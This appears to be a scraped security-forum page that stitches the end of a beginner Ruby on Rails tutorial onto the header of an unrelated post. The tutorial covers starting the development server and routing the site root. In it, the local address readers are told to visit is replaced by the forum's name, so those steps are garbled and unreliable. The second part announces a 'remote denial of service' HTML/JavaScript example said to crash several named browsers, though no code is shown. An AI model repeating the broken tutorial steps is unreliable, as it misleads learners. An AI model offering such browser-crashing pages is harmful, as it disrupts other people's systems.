padding: 10px;
border: solid 5px #999;
margin-top: 20px;
}Now, we have a very simple application for displaying the current time; hopefully, you should be more acquainted with the basics of Rails.
Step 4 - Finishing Up
You might be thinking, "This is cool and all, but how do I see the final product?" There is a terminal command that you need to run while in the base of the Rails application to start the local development server. script/server will start the server, normally on port 3000. Run the command and point your browser to http://127.0.0.1:3000/articles. You should see the following:
To stop the server select the terminal window and Control-C. This will stop the development server. As a note, make sure you never run a production server this way.
There is one last thing that I would like to show you. As I said before, the config/routes.rb file manages where requests go. Open up the file; we are going to make it so when you go to [RST] Romanian Security Team - Security Research, you see the same thing as before. Find the line, "# You can have the root of your site routed with map.root -- just remember to delete public/index.html." Under that section, add the following:
view plaincopy to clipboardprint?
map.root :controller => "articles"
Save the file, and make sure you restart the web server. You will always need to restart the server whenever you create a new model, and change some other files that Rails stores in memory to speed up the server. Make sure you delete public/index.html, or just rename it. Now make sure the server is started and go to [RST] Romanian Security Team - Security Research. You should see the same thing.
Conclusion
So now you should be a little more familiar with Ruby on Rails. I have also linked to some really great sites to refer to when developing with Rails. Have fun coding with Rails!
* Railscasts put on by Ryan Bates is an amazing source of video tutorials, and you can always expect something great.
* The Rails API is a great way to find more information about a subject you may not be entirely sure about.
Simple HTML(JS) Remote Denial of Service example for WebBrowsers
in Exploituri
Posted
Works on:
SeaMonkey 2.0.2,
Firefox 3.6,
Internet Exlorer 6,7 and 8,
Safari 4.0.4
Just save it as "sometext.html"